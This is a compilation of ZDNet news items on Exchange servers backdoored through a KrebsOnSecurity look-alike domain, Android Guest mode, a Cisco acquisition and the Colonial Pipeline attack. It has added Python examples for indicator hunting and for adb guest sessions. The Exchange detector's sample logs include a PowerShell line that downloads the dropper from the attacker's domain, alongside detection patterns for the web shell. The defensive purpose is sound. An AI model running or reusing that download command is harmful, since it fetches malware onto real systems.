ZDNET

Brian Krebs: No, I didn’t hack your Microsoft Exchange server

The KrebsOnSecurity name is, once again, being abused by cyberattackers.

The KrebsOnSecurity name has been invoked in a string of cyberattacks linked to critical Microsoft Exchange Server vulnerabilities.

Security expert Brian Krebs of KrebsOnSecurity is no stranger to figures in the criminal underground who appear to delight in everything from turning him into a meme and launching denial-of-service (DoS) attacks against his website to SWATing, hoax calls to law enforcement that not only waste police time but can also be dangerous.

Now, a domain similar to the legitimate KrebsOnSecurity security resource has been connected to threat actors exploiting a set of critical bugs in Microsoft Exchange Server.

According to a new report released by the Shadowserver Foundation, 21,248 recently compromised Microsoft Exchange servers are communicating with brian[.]krebsonsecurity[.]top.

Krebs says the compromised systems have been backdoored with Babydraco, which handles communication with the malicious domain. In each case a web shell, used for remote access and control, has been dropped at a path not previously seen in these campaigns, /owa/auth/babydraco.aspx.

In addition, a malicious file named “krebsonsecurity.exe” is fetched via PowerShell to facilitate data transfers between the victim server and the domain.

“The motivations of the cybercriminals behind the Krebsonsecurity dot top domain are unclear, but the domain itself has a recent association with other cybercrime activity — and with harassing this author,” Krebs commented.

Microsoft released emergency patches to tackle four zero-day vulnerabilities in Exchange Server 2013, 2016, and 2019 on March 2. The security flaws can be exploited to launch remote code execution attacks and server hijacking.

A selection of mitigation tools has also been released for IT administrators who cannot immediately patch their deployments, and at last count, the Redmond giant says that roughly 92% of internet-facing Exchange servers have been either patched or mitigated.

However, applying the fix does not undo a compromise that happened before it was applied, so patched servers still need to be checked for web shells and other post-exploitation artifacts.
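The check the previous paragraph calls for, as an added example that is not code from the article, from Krebs or from Microsoft: it hunts for the three indicators the article names (the C2 domain, the babydraco.aspx web shell path and the krebsonsecurity.exe dropper) across an IIS W3C log, a text export of PowerShell script-block logging, and a file listing of the Exchange install. The log lines, the PowerShell download URL and the Exchange install path below are constructed for the example; the IIS column names are the standard W3C extended fields, and the real logs on a server would be read from disk instead of the embedded samples.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Indicators named in the article (the domain is defanged there as
# brian[.]krebsonsecurity[.]top).
C2_DOMAIN = "brian.krebsonsecurity.top"
WEBSHELL_PATH = "/owa/auth/babydraco.aspx"
DROPPED_BINARY = "krebsonsecurity.exe"

# Dots are escaped and the match is bounded so that the legitimate
# krebsonsecurity.com, or a look-alike such as notbrian.krebsonsecurity.top,
# does not trip the rule; a deeper subdomain of the C2 host still does.
C2_RE = re.compile(r"(?<![\w-])" + re.escape(C2_DOMAIN) + r"(?![\w-])", re.I)
BINARY_RE = re.compile(r"(?<![\w-])" + re.escape(DROPPED_BINARY) + r"(?![\w-])", re.I)


@dataclass(frozen=True)
class Hit:
    source: str     # which log or listing produced the hit
    indicator: str  # which IoC matched
    detail: str     # the offending line or path


def scan_iis_log(lines: Iterable[str], source: str = "iis") -> List[Hit]:
    """W3C extended IIS log: a '#Fields:' header names the columns, values are
    space separated and unquoted. Flag every request for the web shell path."""
    hits: List[Hit] = []
    uri_idx = method_idx = None
    for raw in lines:
        line = raw.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            uri_idx = fields.index("cs-uri-stem") if "cs-uri-stem" in fields else None
            method_idx = fields.index("cs-method") if "cs-method" in fields else None
            continue
        if not line or line.startswith("#") or uri_idx is None:
            continue
        cols = line.split()
        if len(cols) <= uri_idx:
            continue
        if cols[uri_idx].lower() == WEBSHELL_PATH:
            method = cols[method_idx] if method_idx is not None else "?"
            hits.append(Hit(source, f"{method} {WEBSHELL_PATH}", line))
    return hits


def scan_text_log(lines: Iterable[str], source: str = "powershell") -> List[Hit]:
    """Any free-text log (PowerShell 4104 script blocks, proxy or DNS logs):
    flag lines that mention the C2 domain or the dropped binary."""
    hits: List[Hit] = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if C2_RE.search(line):
            hits.append(Hit(source, C2_DOMAIN, line))
        if BINARY_RE.search(line):
            hits.append(Hit(source, DROPPED_BINARY, line))
    return hits


def scan_paths(paths: Iterable[str], source: str = "filesystem") -> List[Hit]:
    """Flag the web shell wherever it sits under an owa/auth directory; accepts
    Windows or POSIX separators and any letter case."""
    hits: List[Hit] = []
    for path in paths:
        if path.replace("\\", "/").lower().endswith(WEBSHELL_PATH):
            hits.append(Hit(source, WEBSHELL_PATH, path))
    return hits


# Constructed samples: one web shell request among normal OWA traffic, one
# PowerShell download of the dropper next to a benign fetch of the real
# krebsonsecurity.com, and a listing of the OWA auth directory.
SAMPLE_IIS = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-03-25 10:14:03 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 203.0.113.7 Mozilla/5.0 200
2021-03-25 10:14:09 10.0.0.5 POST /owa/auth/babydraco.aspx - 443 - 198.51.100.23 python-requests/2.25.1 200
2021-03-25 10:14:11 10.0.0.5 GET /ecp/default.aspx - 443 - 203.0.113.7 Mozilla/5.0 200
""".splitlines()

SAMPLE_PS = [
    "2021-03-25T10:14:12 4104 ScriptBlockText: (New-Object Net.WebClient).DownloadFile("
    "'http://brian.krebsonsecurity.top/krebsonsecurity.exe','C:\\Windows\\Temp\\krebsonsecurity.exe')",
    "2021-03-25T10:20:00 4104 ScriptBlockText: Invoke-WebRequest https://krebsonsecurity.com/ -OutFile advisory.html",
]

SAMPLE_PATHS = [
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\BabyDraco.aspx",
]


def hunt() -> List[Hit]:
    """Run all three scanners over the embedded samples and return every hit."""
    return scan_iis_log(SAMPLE_IIS) + scan_text_log(SAMPLE_PS) + scan_paths(SAMPLE_PATHS)


if __name__ == "__main__":
    for hit in hunt():
        print(f"[{hit.source}] {hit.indicator}: {hit.detail}")
```

A single hit from any of the three scanners is enough to treat the server as compromised rather than merely patched; the web shell path is matched case-insensitively because IIS and NTFS are, and the domain rule is bounded at both ends so that coverage of the real krebsonsecurity.com site in a proxy log does not produce a false positive.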

Last week, Microsoft warned of subsequent attacks following widespread Exchange server hijacking, including reconnaissance, cryptocurrency mining operations, and ransomware deployment.

“Many of the compromised systems have not yet received a secondary action, such as human-operated ransomware attacks or data exfiltration, indicating attackers could be establishing and keeping their access for potential later actions,” the company said.

The US Cybersecurity and Infrastructure Security Agency (CISA) has also issued an alert warning organizations about post-exploitation web shell deployment on Exchange servers.

Microsoft has also published Indicators of Compromise (IoCs) for this activity.

Source: https://www.zdnet.com/article/brian-krebs-no-i-didnt-hack-your-microsoft-exchange-server/

A useful Android privacy feature that most people have never heard of

Android has a useful hidden feature that the iPhone doesn’t.

Ever handed your iPhone to someone and then remembered that one thing that you don’t want them to see?

Maybe a photo, a text, a personal message, something private from work, or the stash of cat memes you’re collecting.

Whatever it is, we carry a lot of sensitive stuff on our smartphones, and it’s only natural to want to keep that stuff private.

But the developers who work on Android have thought about this, and added a feature that lets you hand your phone to someone else while keeping your information private.

That feature is called Guest mode.

This popped into my head the other day following a conversation with an Android user who said they wished there was a way to lock their private data but still allow others to make calls and use the internet.

That’s what this mode does.

Guest mode creates a temporary account on your smartphone that is free from any of your personal information. No photos. No contacts. No messages. No files.

It also disables the phone feature, but you can choose to activate that if you want.

So, how do you access this feature? Well, it normally lives at Settings > System > Advanced > Multiple Users, but not always. If you can’t find it, a search for users should bring it up.

Guest Mode on Android

When you find it, Guest appears at the bottom of the list of user accounts on the handset. Tap it and the handset switches over.

The process is fast and only takes a few seconds.

To switch back, navigate back to Multiple Users and tap Remove Guest.

If you want to give the Guest Mode access to the phone, before going into Guest, click on the cog next to it and enable Turn on phone calls.

Guest Mode can also optionally make calls

Also, for quick access, you can make this feature available from the lock screen. Handy if you use it regularly.
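The same Guest mode driven from a workstation over adb, as an added example that is not code from the article or from Google: it parses `pm list users`, identifies the guest by its flag bit rather than by the name “Guest” (a regular secondary user could be called that too), creates and switches to the guest, confirms the switch actually took effect, and removes the guest again, which is what “Remove Guest” does. Assumptions: adb is on PATH with a device attached and USB debugging enabled, and the flag values are those of android.content.pm.UserInfo in AOSP; the `pm list users` listing embedded below is constructed so that the parsing runs offline.

```python
import re
import subprocess
from dataclasses import dataclass
from typing import List, Optional

# Flag bits from android.content.pm.UserInfo in AOSP (assumed stable here).
FLAG_PRIMARY = 0x0001
FLAG_ADMIN = 0x0002
FLAG_GUEST = 0x0004
FLAG_EPHEMERAL = 0x0100
FLAG_FULL = 0x0400

# One entry per line of `pm list users`, e.g. "UserInfo{10:Guest:404}";
# the current user carries a trailing " running".
USER_RE = re.compile(r"UserInfo\{(\d+):([^:}]*):([0-9a-fA-F]+)\}(\s+running)?")


@dataclass(frozen=True)
class User:
    id: int
    name: str
    flags: int
    running: bool

    def has(self, flag: int) -> bool:
        return bool(self.flags & flag)


def parse_users(text: str) -> List[User]:
    """Turn `pm list users` output into User records (flags are hex)."""
    return [User(int(m.group(1)), m.group(2), int(m.group(3), 16), m.group(4) is not None)
            for m in USER_RE.finditer(text)]


def guest_user(users: List[User]) -> Optional[User]:
    """The guest is the user with FLAG_GUEST set, whatever it is named."""
    return next((u for u in users if u.has(FLAG_GUEST)), None)


def adb(*args: str, serial: Optional[str] = None) -> str:
    """Run one adb command and return its stdout; raises on a non-zero exit."""
    cmd = ["adb"] + (["-s", serial] if serial else []) + list(args)
    return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout


def start_guest_session(serial: Optional[str] = None) -> int:
    """Create the guest user if none exists, switch to it and verify that the
    device really is running as that user. Returns the guest's user id."""
    guest = guest_user(parse_users(adb("shell", "pm", "list", "users", serial=serial)))
    if guest is None:
        out = adb("shell", "pm", "create-user", "--guest", "Guest", serial=serial)
        match = re.search(r"created user id (\d+)", out)  # "Success: created user id 10"
        if not match:
            raise RuntimeError(f"could not create guest user: {out.strip()}")
        guest_id = int(match.group(1))
    else:
        guest_id = guest.id
    adb("shell", "am", "switch-user", str(guest_id), serial=serial)
    current = int(adb("shell", "am", "get-current-user", serial=serial).strip())
    if current != guest_id:
        raise RuntimeError(f"switch failed: current user is {current}, not {guest_id}")
    return guest_id


def end_guest_session(guest_id: int, owner_id: int = 0, serial: Optional[str] = None) -> None:
    """Equivalent of 'Remove Guest': switch back to the owner and delete the
    guest user together with everything it created during the session."""
    adb("shell", "am", "switch-user", str(owner_id), serial=serial)
    adb("shell", "pm", "remove-user", str(guest_id), serial=serial)


# Constructed sample of `pm list users` on a handset with a guest already set up:
# the owner (PRIMARY|ADMIN|INITIALIZED|FULL|SYSTEM) and a FULL|GUEST user.
SAMPLE_LISTING = """Users:
\tUserInfo{0:Owner:c13} running
\tUserInfo{10:Guest:404}
"""

if __name__ == "__main__":
    gid = start_guest_session()
    print(f"guest session running as user {gid}; when the phone comes back, call end_guest_session({gid})")
```

Checking the flag bit, and checking `am get-current-user` after the switch, is the point of the example: a guest is a separate Android user with its own data directories, which is why the owner’s photos, contacts and messages are not reachable from it, and a user that is merely named “Guest” does not get that isolation.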

It’s a cool feature that helps keep your private stuff private.

Source: https://www.zdnet.com/article/a-useful-android-privacy-feature-that-most-people-have-never-heard-of/

Cisco to acquire Sedonasys Systems for innovative NetFusion platform

Cisco said the Sedona NetFusion platform is the first to deliver complete network abstraction and control.

Cisco announced on Tuesday that it was acquiring Hierarchical Controller market leader Sedonasys Systems in an effort to beef up its multi-vendor, multi-domain automation, and software-defined networking offerings.

Kevin Wollenweber, vice president of product management for Service Provider Network Systems at Cisco, explained in a blog post that to expand the internet and operate networks at massive scale for the billions of new users coming down the pipeline, the internet had to be reinvented in certain ways.

Cisco is acquiring Sedonasys Systems primarily for its NetFusion platform, which has a Hierarchical Controller (HCO) that it said, “enables multi-vendor, multi-domain automation, and software-defined networking.”

Wollenweber said the Sedona NetFusion platform was the first to offer “complete network abstraction and control,” helping CSPs manage their networks across a variety of domains, vendors, layers, and technologies as one single network.

The addition of Sedona NetFusion to the Cisco Crosswork portfolio will allow the company to offer a more advanced network automation platform for Cisco’s Routed Optical Networking Solution.

“HCO is the brain that enables transformation like 5G network slicing, routed optical networking, and disaggregation. We have one simple goal in our network automation strategy — simplification,” Wollenweber said.

“Now, CSPs can gain real-time, dynamic, and seamless control of IP and optical multi-vendor networks together. They can quickly move from clunky, manual operations across siloed teams and technologies to a completely automated and assured network that’s easily managed through a single pane of glass.”

With Cisco Crosswork and Sedona NetFusion, users will have access to a real-time replica of the entire network to predictively manage any changes to the deployment, connectivity, and activation status of all network inventory.

Operators can preview optimization, assurance, and changes, and then commit them as needed, Wollenweber added.

Source: https://www.zdnet.com/article/ciscos-to-acquire-sedonasys-systems-for-innovative-netfusion-platform/

Colonial Pipeline cyberattack shuts down pipeline that supplies 45% of East Coast’s fuel

The attack highlights how ransomware and other cyberattacks are increasingly a threat to real-world infrastructure.

Colonial Pipeline, which accounts for 45% of the East Coast’s fuel, said it has shut down its operations due to a cyberattack.

The attack highlights how ransomware and other cyberattacks are increasingly a threat to real-world infrastructure. The company delivers refined petroleum products such as gasoline, diesel, jet fuel, home heating oil and fuel for the U.S. Military.

In a statement, Colonial Pipeline said:

On May 7, the Colonial Pipeline Company learned it was the victim of a cybersecurity attack. In response, we proactively took certain systems offline to contain the threat, which has temporarily halted all pipeline operations, and affected some of our IT systems. Upon learning of the issue, a leading, third-party cybersecurity firm was engaged, and they have already launched an investigation into the nature and scope of this incident, which is ongoing. We have contacted law enforcement and other federal agencies.

Colonial Pipeline is taking steps to understand and resolve this issue. At this time, our primary focus is the safe and efficient restoration of our service and our efforts to return to normal operation. This process is already underway, and we are working diligently to address this matter and to minimize disruption to our customers and those who rely on Colonial Pipeline.

Here’s a look at the Colonial Pipeline system affected by the cyberattack.

Colonial Pipeline’s shutdown, should it continue, may lead to supply shortages, since the system covers so much territory in the US.

Source: https://www.zdnet.com/article/colonial-pipeline-cyberattack-shuts-down-pipeline-that-supplies-45-of-east-coasts-fuel/
